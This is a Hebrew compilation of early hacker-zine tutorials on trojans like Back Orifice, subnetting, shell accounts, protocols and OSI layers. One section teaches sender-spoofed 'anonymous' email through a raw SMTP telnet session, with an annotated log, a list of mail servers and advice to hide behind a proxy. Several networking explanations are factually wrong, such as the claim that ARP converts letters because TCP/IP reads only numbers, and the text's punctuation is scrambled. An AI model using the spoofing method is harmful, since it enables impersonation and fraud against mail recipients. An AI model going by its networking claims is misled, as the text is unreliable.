‫‪..‬ויש גם כאלה שברגע שאתה לוחץ עליהם‪ ..‬ולכאורה שום דבר לא קורה‬
‫אבל ברגע זה כבר אתה נגוע בטרוייני והילד ששלח לך את הקובץ כבר בתוך המחשב שלך מוריד ממך‬
‫קבצים‬
‫מתאים‪ ..‬יכול להכניס את האי פי שלך בתור ]‪[client‬ואחרי שנדבקת בטרוייני‪ ..‬כל מי שיש לו לקוח‬
‫שרת‪ ..‬את הפורט של השרת ולהתחבר אליך למחשב‬
‫‪:‬ובעזרת פקודות שהאיש שתכנת את הטרוייני קבע אפשר לעשות לך הרבה דברים‪ ,‬כמו‬
‫‪,‬גניבת סיסמאות‪ ,‬כניסה לסיפריות‪ ,‬כיבוי מחשב‪ ,‬לראות סיסמאות‪ ,‬לראות תמונות של המסך שלך‬
‫‪.‬לפתוח ולסגור את הסידי‪-‬רום‪ ,‬לשלוט בעכבר‪ ,‬להפעיל תוכניות‪ ,‬לשלוח הודעות‪ ,‬והרבה הרבה יותר‬
‫‪ cdc‬שתוכנת ע"י ]‪[back oriffice‬אחד הטרויינים הפופולריים ביותר בעולם הוא באק אורפיס‬
‫‪ win nt‬והוא כל כך פופולרי‪ ,‬כי הוא מאפשר גישה גם למערכות‬
‫‪.‬וגם קוד המקור שלו שוחרר‪ ,‬ולכן זה עושה אותו אפילו יותר מסוכן‬
‫פתרונות‬
‫```````‬
‫!אל תקבל קבצים מאנשים שאתה לא מכיר‪ ..‬ואם הקובץ נראה לך חשוד‪ ..‬מחוק אותו ישר *‬
‫שמוצאת טרויינים במחשבך ומוחקת אותם "‪ "the cleaner‬ישנה תוכנה נהדרת שנקראת *‬
‫עדכן את האנטי ווירוס שלך כל שבוע *‬
‫\ ‪: sock \ port‬אתה יכול לפתוח את הקובץ לפי שהפעלת אותו דרך הדוס ולחפש מילים חשודות כמו *‬
‫או כל מילה אחרת שנראת לך שיכולה להיות חשודה ‪winsock \ server‬‬
‫(‪ edit filename.exe‬כדיי לפתוח קובץ בדוס‪ :‬פתח את הדוס < כנס לסיפירה של הקובץ < ולחץ)‬
‫דעתי האישית‬
‫לדעתי טרויינים זה לא נקרא פריצה כי אתה לא באמת פורץ‪ .‬אתה רק מנצל אנשים תמימים‪ .‬וגם‬
‫‪,‬אתה לא לומד מזה כלום‬
‫‪.‬וזה ישאיר אותך באשליה שפריצה זה משחק ילדים ושזה קל‬
‫‪..‬אם אתה באמת רוצה לדעת איך דברים פועלים ואיך לפרוץ ולאבטח דברים‬
‫אני ממליץ לך להכנס לאתרים של אבטחה ופריצות וללמוד ולקרוא טקסטים! והרבה! כי בסך הכל‬
‫‪.‬ידע זה כח‬
‫‪-‬‬‫אתם יכולים להגיב\להעיר\לשאול שאלות בפורום‪ ..‬ואני ישמח לענות‬
‫ואני מקווה שעזרתי לכם להבין מה זה בעצם טרוייני ואיך הוא פועל‬
‫‪by rul3r‬‬

‫סאבנטינג‬
‫‪.‬מה זה סאבנטינג ? רוצים לדעת ? תמשיכו לקרוא‬
‫‪ :‬מספר דברים שכדאי לדעת לפני הקריאה‬
‫‪arp list - list of the all mac )media access control( numbers.‬‬
‫‪rip list - list of all the routers.‬‬
‫‪defaultgateway - the input chip of the router.‬‬
‫כל חומר הכתוב פה הוא למטרות לימודיות בלבד ואין לעשות בו כל פעולה שהיא נגד החוקף‬
‫‪.‬לא שיש מה לעשות אבל בכל מקרה‬
‫‪.‬אני נותן מבט בסיסי כדי שתוכלו להכיר את הרשת שעליה אתם עובדים או ****** אליה‬
‫‪:‬עכשיו אני אתן לכם מבט בסיסי על הנושא שנקרא סבנטינג‬
‫‪,‬סבנטינג‪ :‬חלק מהרשת ‪ ,‬יכול להיות רשת פיזית עצמאית בפני עצמה‬
‫‪,‬המטפלת ב"פלח" מסוים מהבנה של הרשת השלמה‬
‫‪.‬בדרך כלל רשת שכזו חולקת תת כתובת של הרשת השלמה עם שאר הרשתות המישניות‬
‫‪:‬אנא הביטו בתרשים הבא‬
‫_ _ _ _‬
‫|‪|4| |3| |2| |1‬‬
‫_‬
‫|‪|5‬‬
‫_ _ _ _‬
‫|‪|6| |7| |8| |9‬‬
‫‪.‬למשל אנחנו רוצים לשלוח משהו ממחשב ‪ 3‬למחשב ‪ 8‬באופן ישיר‬
‫‪'.‬אם נעשה את זה בדרך הרגילה אז זה יקח זמן‪ ,‬עד שכל מחשב יאשר וכו‬
‫? אבל מה יקרה אם נעשה את זה עם סוד שידור אחר‬
‫? למשל ‪ unicast‬כמו‬
‫‪,‬הוא סוג של שידור אשר לא יעביר הכל דרך כל המחשבים ‪ ? unicast‬אתם שואלים מה זה‬
‫אתם אומרים לו תשלח דאטה למחשב ‪ 8‬ממחשב ‪ 3‬הוא יעשה זאת ללא מעבר דרך המחשבים‪:‬‬
‫‪4,5,6,7.‬‬
‫‪.‬לא עובד אם אותיות‪ ,‬מספרים בלבד ‪ tcp/ip‬כי ‪ netbuei,‬סוג השידור הזה לא עובד אם פרוטוקול‬
‫‪(.‬אם אתם לא מכירים או הפרוטוקול רוצו ללמוד במדריך הקודם שלי)‬
‫‪.‬הוא נתב ‪ ,‬התקן חומרה המנתב הודעות ואינפורמציה ברשת בהתאם לצורתם (‪ )router‬עכשיו‪ ,‬ראוטר‬
‫‪.‬ראוטר הוא לא פריט זול‪ ,‬הוא עולה כ‪ 10,000 -‬דולר בחו"ל‬
‫‪".‬הראוטרים טובים ביותר הם של החברה "סיסקו‬
‫‪,‬לשני גורמים (‪ )ip‬עכשיו נעבור לפירוק האיפי‬
‫‪network id, host id.‬‬
‫‪.‬חוקים לאיפי‪ ,‬אסור שיתחיל ב ‪ ,127‬אסור שיסתיים ב‪225 ,0 -‬‬
‫‪.‬הוא גם מחוץ לטווח‪ .‬אם אתם לא יודעים למה אז תבררו ואז תמשיכו לקרוא ‪127.0.0.1‬‬
‫‪ - network, host , id.‬איך נזהה באיפי מה הוא ה‬
‫(‪: )subnet mask‬הכל מתחלק ל‪ 3‬קבוצות עיקריות‬
‫‪ : ip: z.q.w.x‬דוגמא‬
‫‪z q w x‬‬
‫‪-----------------------------‬‬‫| ‪class a: | n | | h | | h | | h‬‬
‫‪-----------------------------‬‬‫| ‪class b: | n | | n | | h | | h‬‬
‫‪-----------------------------‬‬‫| ‪class c | n | | n | | n | | h‬‬
‫‪-----------------------------‬‬‫‪.‬היא מראה מה זה מה‪ ,‬מה מהם הנטוורק אידי‪ ,‬ומה ההוסט אידי ומבדילה ביניהם ‪subnet mask -‬‬

‫‪- subnet mask.‬עכשיו נעבור לזיהוי ל איפי ללא ה‬
‫=========================================‬
‫|‪class a: | 1 | | 1-127 | | 126 | | 16777214‬‬
‫=========================================‬
‫| ‪class b: | 10| | 128-191 | | 16384 | | 65534‬‬
‫=========================================‬
‫| ‪class c |100| | 192-223 | | 2097152 | | 254‬‬
‫=========================================‬
‫‪:‬דוגמא‬
‫(]‪155.25.69.41 - class b )quz 155 is between 128-191[class b‬‬
‫(]‪215.25.69.41 - class c )quz 215 is between 192-223[class c‬‬
‫(]‪62.25.69.41 - class a )quz 62 is between 1-127[class a‬‬
‫(! ‪377.2.3.5 - not allowed )quz 377 is out of limit‬‬
‫(!‪213.2.2.0 - not allowed )quz ip numbers rn't allowed to end with a 0‬‬
‫‪ .‬מבינים‪ ,‬אם כן יופי‪ ,‬אם לא אז תקראו בסוף זה יקלט ‪ ,‬אני מקווה‬
‫! והנה עוד כמה מושגים שכדאי לדעת לעובדים ברשת‬
‫‪,‬התקן רשת הקובע את נתיב "חבילות" הנתונים אל יעדיהן ברשת ‪switch -‬‬
‫‪.‬קובע את יעד חבילות המידע בתוך הרשת‬
‫‪,‬סוג אי פי נימרץ ‪ ,‬הנפוץ ביותר קיום בעולם ‪dynamic ip -‬‬
‫‪,‬כל פעם כאשר מתחברים לרשת מסוימת נקבע אי פי חדש ושונה‬
‫‪,‬הבעיה בסוג הזה של האי פי הוא שזיהוי של משתמשים‬
‫‪.‬קשה ובילתי יציב‪ ,‬לא ניתן להיסתמך על נתונים מכוון שכשיתחברו מחדש הנתונים ישתנו‬
‫‪ ,‬סוג אי פי נייח ולא דינמי‪ ,‬פחות נפוץ ביותר קיום ‪static ip -‬‬
‫‪,‬מובנה ברוב טכנולוגיות התקשורת החדשות‪ ,‬חיבור הוא היציב ביותר והקל ביותר מבחינת זיהוי‬
‫‪,‬משתמש שהתחבר לרשת ישאר עם אותו אי פי לעולם‬
‫‪.‬לכל מחשב יש אי פי אחד או יותר שמובנים עליו ורק בהם הוא יכול להשתמש‬
‫‪,‬אז אנו מקווה שנהניתם ואנחנו יודעים שאתם בטח אומרים בלב בואנה זה חומר משעמם‬
‫‪.‬אולי הוא משעמים אבל הוא חשוב לכל מי שרוצה להתעסק ברשתות‬
‫‪ .‬רק שתדעו‪ ,‬חצי מהחומר פה מופיע במבחן הגמר של קורס של מיקרוסופט‬
‫‪by pirsing & zeh‬‬

‫דואר אנונימי דרך טלנט‬
‫‪.‬אני יודע שהיום יש תוכנות שעושות את זה‪ ,‬אבל תמיד טוב לדעת שיטות נוספות‬
‫הוא שרת שאחראי על דואר יוצא ודרכו אפשר לשלוח דואר אלקטרוני ‪ smpt‬שרת‬
‫‪(.‬פורט ברירת המחדל שלו הוא ‪)25‬‬
‫‪:‬וככה זה עובד‬
‫מתחברים לשרת דואר יוצא‪1.‬‬
‫‪telnet netvision.net.il 25‬‬
‫‪.‬או כל שרת דואר אחר‬
‫‪:‬ואלו הפקודות‪2.‬‬
‫‪.‬מזהה אותך לפני השרת וקובע שאתה המקור של השליחה ‪ oleh‬או ‪helo -‬‬
‫פעולה שלכאורה לא עושה כלום אבל היא בעצם מחזירה פלט מהשרת אליך וככה אפשר ‪noop -‬‬
‫‪.‬לבדוק אם אתה עדיין מחובר ומה המהירות של החיבור בינך אל השרת‬
‫(אני חושב שזה דיי ברור‪( ...‬מתנתק מהשרת ‪quit -‬‬
‫‪.‬עזרה בקשר לפקודה מסויימת ]‪help - [topic‬‬
‫(יציג רשימה של הפקודות שניתנות לשימוש בשרת‪( .‬בד"כ דומה ברוב השרתים ‪help -‬‬
‫מוחק את כל מה שהכנסתם עד עכשיו‪ ,‬כתובת שולח וכדומה ‪rset - -‬‬
‫כתובת השולח >‪mail from - :<address‬‬
‫‪.‬מכניס את התאריך של כתיבת הדוא"ל ופותח את גוף המכתב ‪data -‬‬
‫‪.‬שולח את המכתב ‪atuh - -‬‬
‫‪: - vrfy rul3r‬בודק אם המשתמש קיים בשרת‪ .‬דוגמא ‪vrfy -‬‬
‫כתובת היעד (ניתן לרשום את הפקודה הזאת יותר מפעם אחת ובכך לשלוח ‪rcpt to:<recipient> -‬‬
‫‪(.‬ליותר מאיש אחד‬
‫?איך לגלות אם קיבלתם דואר מזוייף‬
‫תסתכלו ב‬
‫‪headers‬‬
‫של הדואר ואז אתם רואים את האי פי של מי ששלח אז תסתכלו על‬
‫‪.‬הכתובת של מי ששלח ותראו שזו לא אותה הכתובת‬
‫‪:‬הערות‬
‫‪.‬כל הפעולות שלכם נרשמות ‪ ,‬כולל למי אתם שולחים את האי פי שלכם וכל השאר‪+‬‬
‫בד"כ אם אין פעילות ברוב שרתי הדואר תוך ‪ 60‬שניות הקשר ינותק‪+‬‬
‫‪.‬היום יש תוכנות שעושות את זה‪+‬‬
‫רצוי לעשות את זה מאחורי פרוקסי‪+‬‬
‫לא כדי להשתמש בתוכנות כי לרוב הן לא נותנות להתחבר עם פרוקסי‪+‬‬
‫‪:‬רשימה של שרתי דואר‬
‫‪plix.com:25 ids.net:25 student.uq.edu.au:25‬‬
‫‪istar.ca:25 total.net:25 mail.tfs.net:25‬‬
‫‪ecis.com:25 mindspring.com:25‬‬
‫‪popmail.uc.edu:25 mail.atcon.com:25‬‬
‫‪future.net:25 aloha.net:25 ovnet.com:25‬‬
‫‪connect.reach.net:25 valley-internet.net:25‬‬
‫‪valleynet.com:25 milo.cfw.com:25‬‬
‫‪scs.august.com:25 hiwaay.net:25‬‬

‫הערה ‪ 25:‬זה לא חלק מהשם זה הפורט‬
‫לוג לדוגמה‪ :‬מה שכתוב בתוך ה ‪ /* */‬זה הערות שלי‬
‫‪---‬‬

‫‪newmail.net:25 mail.yahoo.com:25‬‬
‫‪mail.hotmail.com:25 mail.surfree.net.il:25‬‬
‫‪out.inter.net.il:25 mail.airmail.net:25‬‬
‫‪mail.geocities.com:25 mnsi.net:25‬‬
‫‪hacker.com:25 mail.iaw.on.ca:25‬‬
‫‪pdx.sisna.com:25 jaring.my:25‬‬
‫‪chollian.dacom.co.kr:25 all-yours.net:25‬‬

connected to netvision.net.il on port 25 /*‫*מתחבר לסרבר של נטוויז'ן‬/
220 ftp.netvision.net.il esmtp sendmail 8.9.3/8.9.3; mon, 2 apr 2001 18:47:18 +0200 )ist( /*
‫*מקבל תאריך מלא וגירסא של שרת האימייל שלהם‬/
helo ihc /*‫ מזדהה בשם‬ihc*/
250 ftp.netvision.net.il hello diup-205-209.inter.net.il [213.8.205.209], pleased to meet you /*
‫*מקבל תגובה עם האייפי שנקלט במערכת שלהם‬/
help /*‫*שולח בקשה לעזרה ולראות את כל הפקודות‬/
214-this is sendmail version 8.9.3 ‫*של התוכנה שהשרת מריץ‬/ ‫*גירסא‬/
214-commands: /*‫*מקבל את כל הפקודות‬/
214- helo ehlo mail rcpt data
214- rset noop quit help vrfy
214- expn verb
214-for more info use "help <topic>".
214-to report bugs in the implementation send email to
214sendmail@cs.berkeley.edu.
214-for local information send email to postmaster at your site.
214 end of help info /*‫*סיים לקבל את הפקודות‬/
mail from: <ihc@netvision.net.il> /*‫*אומר לשרת את הכתובת אימייל שאני רוצה לשלוח ממנה‬/
250 <ihc@netvision.net.il>... sender ok /*‫*מקבל אישור מהשרת‬/
rcpt to: <webmaster@netvision.net.il> /*‫*אומר לשרת למי אני רוצה לשלוח‬/
250 <webmaster@netvision.net.il>... recipient ok /*‫*מקבל אישור מהשרת‬/
data /*‫*שולח פקודה דאטא‬/
354 enter mail, end with "." on a line by itself /*‫מקבל תגובה מהשרת שאומרת לשים נקודה‬
‫*בסוף ההודעה‬/
subject: test /*‫*קובע את נושא ההודעה‬/
hey man /*‫*כותב את ההודעה‬/
whats up?
ihc r0x
. /*‫*כותב נקודה כדיי להגיד לשרת לסגור את ההודעה‬/
250 saa05248 message accepted for delivery /*‫*מקבל אישור מהשרת שההודעה נשלחה‬/
noop /*‫*שולח פקודה "נופ" כדיי לראות שאני עדיין מחובר‬/
250 ok /*‫*מקבל תגובה מהשרת וככה אני יודע שאני עוד מחובר‬/
vrfy ihc /*‫ בודק אם יש בשרת משתמש בשם‬ihc*/
252 cannot vrfy user; try rcpt to attempt delivery )or try finger( /*‫מקבל תגובה שלישית‬
‫*מהשרת שאומרת שאין כזה משתמש‬/
quit /*‫*שולח פקודה יציאה מהשרת‬/
221 ftp.netvision.net.il closing connection /*‫*מקבל הודעת יציאה מהשרת‬/
disconnected from netvision.net.il /*‫*החיבור נותק‬/
by vortex
rul3r‫תיקונים ותוספות‬

‫חשבונות‪shell‬‬
‫‪:‬הקדמה‬
‫======‬
‫המדריך הזה נכתב אחרי מאות בקשות של אנשים שרוצים לדעת מה זה לעזאזל שאלל‪ ,‬לשם מה הוא‬
‫‪.‬נועד‪ ,‬איך משתמשים בו ולמה הוא טוב בכלל; על כל זה נרחיב במדריך הנ"ל‬
‫?מהו חשבון שאלל‬
‫===============‬
‫‪...‬חשבון שאלל הוא בעצם סקריפט‪ ,‬שהלקוח ]אנחנו[‪ ,‬מתחברים אליו בעזרת טלנט פשוט‬
‫שאלל הוא בעצם מערכת יוניקס\לינוקס מרוחקת‪...‬ולפעמים אתה שולט על כל המחשב המרוחק דרך‬
‫‪...‬המחשב הביתי שלך אפילו אם יש לך וינדוס ‪ ,98‬או כל דבר אחר‬
‫וכל דבר אחר שבא לכם לראש‪...‬אבל ‪ ftp,‬דרך השאלל אפשר לגלוש באינטרנט‪ ,‬להתקין שרתי צ'אט‬
‫‪.‬בדרך כלל השרתים הרגילים מאפשרים להריץ עד ‪ 3‬שרתים בו זמנית‬
‫?לשם מה הוא נועד‬
‫================‬
‫חשבון השאלל נועד להרבה מטרות חשובות וחשובות פחות‪ ,‬אבל הוא מיועד בעיקר לאנשים שאין‬
‫להם לינוקס‪ ,‬אבל הם בכל זאת רוצים להשתמש בשירותים שהלינוקס מקנה להם‪ ,‬בלי להתקין אותו‬
‫‪.‬במחשב שלכם‬
‫עוד השאלל משמש ללימוד‪ ,‬צבירת ניסיון בלינוקס ‪-‬כי כל הפקודות בו נכתבות ידנית כי אין לכם‬
‫‪.‬בשאלל שום מסך גראפי כמו בוינדוס‪ ,‬והוא איכשהו מזכיר את מערכת ה‪-‬דוס‬
‫עוד שימוש עיקרי בשאלל הוא כמובן פריצה‪...‬למרות שזה ממש לא חוקי ויכול לסבך אותכם בגדול‪,‬‬
‫!!כי כל האחריות נופלת על בעל השאלל‪ ,‬זה בכל זאת אפשרי ורב כוח‬
‫ואף מגיע ‪ t3‬רוב שרתי השאלל פועלים על פס תקשורת מהיר מאוד‪ ,‬כשבממוצע הוא פועל על מערכות‬
‫שבמילים פשוטות מי שלא יודע מה זה‪ ,‬המכשיר מגיע למהירות של יותר מחמש‪ oc48 -‬להתקנים כמו‬
‫!!ג'יגה‪-‬בייט לשניה‬
‫בשאלל אתם יכולים להתקין שרתים מגוונים‪ ,‬והכל באיכות שרק מערכת יוניקס יכולה לקנות‪-‬‬
‫לכם‪...‬ושלא נדבר על המהירות שאיתה אתם עובדים‪ .‬לעומת זאת‪ ,‬בשאללים שניתנים חינם‪,‬‬
‫האפשרויות מאוד מוגבלות ולא נותנות לכם להריץ בוטים לצ'אטים או שרתים שתופסים הרבה‬
‫זיכרון ועוד הרבה הגבלות אחרות‪ ,‬כך שאם אתם באמת מחליטים להתנסות בשאלל‪ ,‬בלי הפחד של‬
‫להרוס לעצמכם את המחשב אם תתקינו לינוקס‪ ,‬עדיף יהיה לכם לשלם ‪ 8‬עד ‪ 20‬דולרים לחשבון‬
‫!שאלל מתקדם‪ ,‬שייאפשר לכם לעשות בו כמעט כל דבר אפשרי בדיוק כמו במערכת יוניקס רגילה‬
‫פקודות בסיסיות בשאלל‬
‫====================‬
‫טוב‪ ,‬לאלו שלא יודעים דבר ביוניקס\לינוקס ]אותו הדבר[‪ ,‬ניתן כמה פקודות בסיסיות לשימוש‬
‫‪...‬בשאלל שלכם‪..‬כי הפקודות שונות מאלו שאתם מכירים‬
‫‪:‬הערה‬
‫=====‬
‫!במערכות יוניקס יש הבדל בין אותיות גדולות לקטנות‪ ,‬ככה שתקדישו לזה תשומת לב‬
‫‪ -.‬להיכנס לספרייה שאתם רוצים‪...‬בדיוק אותה הפקודה המוכרת ממערכת הדוס ‪cd‬‬
‫ ‪.‬שנותן לכם לראות את תוכן הקובץ אותו אתם כותבים לצפייה ‪cat‬‬‫‪.‬פקודה האומרת לתוכנה להוריד את הקובץ מהלינק אותו תכתבו לידה ‪wget -‬‬
‫זוהי =תוכנה= אמיתית‪ ,‬כמובן בלי שום גראפיקה‪ ,‬ככה שאל תבהלו‪ ,‬אבל זהו דפדפן ‪lynx -‬‬
‫!האינטרנט המהיר ביותר בעולם‪....‬כי הוא פותח אתרים בצורה טקסטואלית‬
‫!שוב =תוכנה= שנותנת לכם לערוך קבצי טקסט‪ ,‬לתכנת!‪ ,‬ועוד הרבה אפשרויות אחרות ‪emacs- -‬‬
‫‪ .gz‬פקודה לפתיחת קובץ מכווץ שאתם מורידים מהאינטרנט מסוג ‪gzip - -‬‬
‫‪ .‬והוא פותח קבצים מכווצים מסוג ‪ -gzip‬זהו עוד כיווץ שבא בדרך כלל בייחד עם ה ‪tar - tar -‬‬
‫ פקודה מוכרת לכולנו‪...‬אין צורך לפרט אני חושב ‪dir‬‬‫‪...‬הקומפיילר לשפת ה שאי אפשר לזוז בלעדיו כמעט בלינוקס ‪gcc - c\c++‬‬
‫‪:‬עוד חשוב לציין‪ ,‬שאפשר לראות את העזרה לפקודות\תוכנות המבוקשות בעזרת פקודת‬

‫‪help--command‬‬
‫!עם רווח בין שני הפקודות‬
‫אם אתם רוצים לקרוא יותר לעומק את הפקודות או כל דבר אחר לתפעול הלינוקס‪ ,‬השתמשו‬
‫‪:‬בפקודת‬
‫‪man‬‬
‫‪.‬וליידה את הפקודה\תוכנה\כל דבר אחר שעליו אתם רוצים לקרוא עוד‬
‫טוב‪ ,‬עכשיו אתם בטח רוצים כמה כתובת מאיפה אפשר להשיג שאללים‪ ,‬אז הנה‪ ,‬ניתן לכם כמה‬
‫‪...‬כתובת של שאללים חינמים שלא מומלצים כל‪-‬כך‪ ,‬אבל בכל זאת‬
‫‪nether.net‬‬
‫‪freeshell.org‬‬
‫אני לא יודע אם עדיין יש שם רשימות של שאללים‪ ,‬אבל בכל זאת‪www.cyberarmy.com/lists -‬‬
‫!תנסו‬
‫‪ efnet, dalnet‬שאללים בתשלום אפשר למצוא דרך שרתי הצ'אט של‬
‫‪: #shells, shell,bouncers‬בחדרים‬
‫!שנותנים לכם המון מקומות לקניית שאללים טובים‬
‫‪:‬אם אתם בכל זאת לא יודעים איך להתחבר לשאלל שלכם‪ ,‬אז הנה‬
‫בפורט ‪telnet yourshellhere - 23‬‬
‫‪by cntax‬‬

‫פרוטוקולים‪.‬‬
‫קודם כל נתחיל אם סוגי הפרוטוקולים הקיימים ומה הם עושים‪.‬‬
‫הערה קטנה לפני שנתחיל‪ ,‬שני סוגי הרשתות הקיימות‪.‬‬
‫רשת מקומית ‪lan -‬‬
‫‪.‬רשת שמשתרעת על יותר מ‪ 12‬מחשבים באותו חדר ‪wan -‬‬
‫כל הפרוטוקולים מתחלקים לשני סוגים‪.‬‬
‫הוא פרוטוקול אשר שולח הודעה‪/‬מידע או כל דבר אחר ללא המתנה ‪1.connectionless protocol -‬‬
‫‪.‬לאישור מהנמען‪ .‬ככה הפרוטוקול עובד מהר יותר והוא גמיש יותר‬
‫הוא פרוטוקול אשר שולח הודעה‪/‬מידע למחשב אחר והוא ‪2.connection oriented protocol -‬‬
‫ממתין לאישור הנמען‪ ,‬הפרוטוקול הנ"ל מאובטח ביותר והעברת הנתונים תהיה איטית יותר‬
‫‪.‬בגלל ההמתנה לתשובה‬
‫עכשיו נעבור לעבודת הפרוטוקולים תחת המודלים של ה ‪.osi -‬‬
‫‪ips‬‬
‫‪not specified‬‬
‫‪arp, rarp‬‬
‫‪ip‬‬
‫‪tcp, udp‬‬
‫‪telnet, ftp, smtp, snmp, http‬‬

‫‪osi‬‬
‫‪application‬‬
‫‪presentation‬‬
‫‪session‬‬
‫‪transport‬‬
‫‪network, data link, physical‬‬

‫יש פרוטוקול אשר יוצא דופן מהשאר‪ ..‬בגלל שהוא עובד על המרת תווים למספרים‪.‬‬
‫‪arp - address resolution protocol.‬‬
‫ויש אחד אשר עובד על העברת חדשות ‪ ,‬אבל הוא לא ממש מעניין‪.‬‬
‫‪nntp - network news transport protocol.‬‬
‫פה אני אתן רשימה של פרוטוקולים שלא נמצאים בשימוש ע"י כל אחד‪ ,‬אבל שימושיים לאלה‬
‫שעובדים איתם‪.‬‬
‫! שם הפרוטוקול‬
‫? מה הוא עושה‬
‫‪icmp - internet control message protocol‬‬
‫משמש לבקרת שגיאות‬
‫‪dhcp - dynamic host configuration‬‬
‫באופן ידני לרשת ‪ ip‬הקצאת‬
‫‪protocol‬‬
‫‪rip - routing information protocol‬‬
‫‪ - tcp/ip‬קביעת וקטור המסלולים ב‬
‫‪smb - server message box‬‬
‫‪ - redirector‬משמש כ‬
‫‪netbios - working under session‬‬
‫(‪ )ip‬משמש ל‪-‬קלט‪/‬פלט של שמות‬
‫‪netbeui - working under transport‬‬
‫‪ - routing‬רק שזה לא תומך ב ‪ netbios‬כמו‬
‫‪message‬‬
‫‪wins - windows internet naming service‬‬
‫‪- ip.‬מערכת לתרגום שמות ל‬

‫עכשיו נעבור לפרוטוקולים הנפוצים יותר והשימושיים יותר‪.‬‬
‫? מה הוא עושה‬
‫‪.‬קשר מנקודה לנקודה‬
‫‪ - ppp‬עושה פעולה אחת לפני ה‬
‫‪.‬רק בצורה דחוסה ‪ - ppp,‬ה ‪-"- -"- -"-"-‬‬

‫! שם הפרוטוקול‬
‫‪ppp - point to point protocol‬‬
‫‪slip - serial line internet protocol‬‬
‫‪cslip - compress serial line internet‬‬
‫‪protocol‬‬

‫‪ftp - file transfer protocol‬‬
‫(‪. )transport‬הורדת קבצים והעלאת קבצים‬
‫‪telnet - terminal networking‬‬
‫‪.‬פרוטוקול לעבודה בין מסופים‬
‫‪smtp - simple mail transfer protocol‬‬
‫‪.‬פרוטוקול לדואר נכנס‪/‬יוצא‬
‫‪http - hypertext transfer protocol‬‬
‫'פרוטוקול לאינטרנט היפר‪-‬טקסט‪ .‬אתרים וכו‬
‫‪snmp - simple network management‬‬
‫‪.‬פרוטוקול לניהול פשוט של הרשת‬
‫‪protocol‬‬
‫‪udp - user datagram protocol‬‬
‫‪.‬עוזר להעברת חבילות גדולות של מידע‬
‫‪tcp - transmission control protocol‬‬
‫‪.‬משמש להעברת‪/‬קבלת ‪.‬נתונים‬
‫‪ip - internet protocol‬‬
‫‪.‬משמש לתקשורת לאינטרנט‬
‫‪tcp / ip - transmission control‬‬
‫חבילת פרוטוקולים נפוצה אשר משמשת כדי‬
‫‪protocol/internet protocol‬‬
‫‪.‬לגלוש לרשת האינטרנט‬
‫ישנו כמו מין דבר מעיק כזה‪ ,‬שאני לא יודע אם לקרוא לזה באג בפרוטוקול הנפוץ ביותר בעולם‪.‬‬
‫ה‪ ,tcp/ip -‬כאשר אתה משתמש בפרוטוקול לשליחת מידע אז‪ ,‬בכל פעם שאתה שולח מידע בחבילה‬
‫אז אתה גם מוריד חבילה באותו זמן‪ ,‬בלי ידיעתך‪ .‬אז זה מקשה משפיע על קצב העברת הנתונים ממך‬
‫אל נמען אחר…‪.‬‬
‫הפרוטוקול הנ"ל אינו מסוגל לקרוא אותיות‪ ,‬רק ספרות ]מספרים[‪ ,‬כגון (‪()203.201.023.0‬כתובות ‪,)ip‬‬
‫אז בכל מחשב שמשתמש בפרוטוקול זה ישנו גם פרוטוקול שאחראי על המרת האותיות למספרים‪.‬‬
‫הוא נקרא‪:‬‬
‫‪.arp - address resolution protocol‬‬
‫כל תהליך ההמרה מתחיל ככה‪:‬‬
‫‪1.netbios cache, 2.wins, 3.broadcast, 4.lmhost file, 5.host file, 6. dns.‬‬
‫‪2‬דוגמא‪:‬‬
‫הוא קולט את האותיות ומתחיל בהמרה ‪•bioscache = [www.walla.co.il] -‬‬
‫‪.‬המנגנון הממיר את האותיות למספרים‪ ,‬הוא מתחיל בפענוח האותיות ‪•wins -‬‬
‫‪.‬שידור של אות ‪•broadcast -‬‬
‫‪.‬ממיר אותיות למספרים ולהיפך‪ .‬במקרה שלנו מאותיות למספרים ‪•lmhost file -‬‬
‫‪.‬קובץ מארח ע"פי הנתונים של ה קובץ מעל ‪•host file -‬‬
‫הפלט של ההמרה ‪•dns = [192.118.70.2] -‬‬
‫ככה עובד הפרוטוקול הידוע והנפוץ ‪.tcp/ip‬‬
‫‪----------------------------------------------------------------------------------------------‬‬‫נעבור לשני הגדרות שהם קצת יותר מתקדמות בעבודה ברשת‪.‬‬
‫‪odi - open datalink interface & open device interconnect.‬‬
‫‪ndis - network driver/device interface specification.‬‬
‫‪.‬צורת הצגה של העברת נתונים פתוחים ‪odi -‬‬
‫‪.‬ממשק למנהלי רשת בסביבת חלונות ‪ndis -‬‬
‫‪by pirsing‬‬

‫מבוא לשכבת ‪osi‬‬
‫ה‪ osi-‬הוצא לאור ב ‪ 1978‬ע"י ה‪ ( iso-‬ארגון התקנים הבינלאומי)‬
‫ה‪ osi-‬מגדיר את פונקציות התקשורת בין מחשבים במונחים של שבע שכבות‪.‬‬
‫הרעיון של ‪ osi‬הוא שמערכות שונות יוכלו לתקשר ביניהן בעזרת פרוטוקולים וממשקים ששתי‬
‫המערכות מבינות‪.‬‬
‫כשארגון התקנים הבינלאומי יצר את ה‪ osi-‬הוא חילק את פונקציות הרשתות לשבעה שכבות והן‪:‬‬
‫______________‬
‫| ‪| application‬‬
‫|______________|‬
‫| ‪| presentation‬‬
‫|______________|‬
‫| ‪| session‬‬
‫|______________|‬
‫| ‪| transport‬‬
‫|______________|‬
‫| ‪| network‬‬
‫|______________|‬
‫| ‪| data link‬‬
‫|______________|‬
‫| ‪| physical‬‬
‫|______________|‬
‫עכשיו אני אסביר על כל שכבה‪.‬‬
‫* שכבת ‪physical‬‬
‫השכבה הזאת היא בעצם הדברים הפיזיים‪ ,‬שאפשר לגעת בהם כגון כבלים היא גם מגדירה כל מיני‬
‫דברים‬
‫כמו פינים בכבלים‪.‬‬
‫* שכבת ‪data link‬‬
‫שכבה זו מספקת העברת נתונים מנקודה לנקודה השכבה גם מספקת טיפול בבעיות בהעברת‬
‫הנתונים‪.‬‬
‫* שכבת ‪network‬‬
‫השכבה הזאת מאפשרת העברת נתונים בין השכבות‪ ,‬השכבה הזאת יכולה לנווט ולשלוט בחבילות‪.‬‬
‫יש עוד תפקיד לשכבה שהוא לתת כתובת לחבילות שנוצרו ע"י השכבה ‪ transport‬שנסביר עליה תיכף‬
‫אתם‬
‫כבר תבינו למה היא נותנת להם כתובת‪.‬‬
‫* שכבת ‪transport‬‬
‫נגיד שאתה רוצה לשלוח מכתב לשרת מסויים אבל הוא שני דפים אז אתה שולח אותו בשני חבילות‪,‬‬
‫השכבה הזאת ממספרת את החבילות מצד השולח והוא בודק שהם מסודרות לפי סדר השליחה לפני‬
‫שהוא מרכיב‬
‫הכל לדבר אחד‪.‬‬
‫* שכבת ‪session‬‬
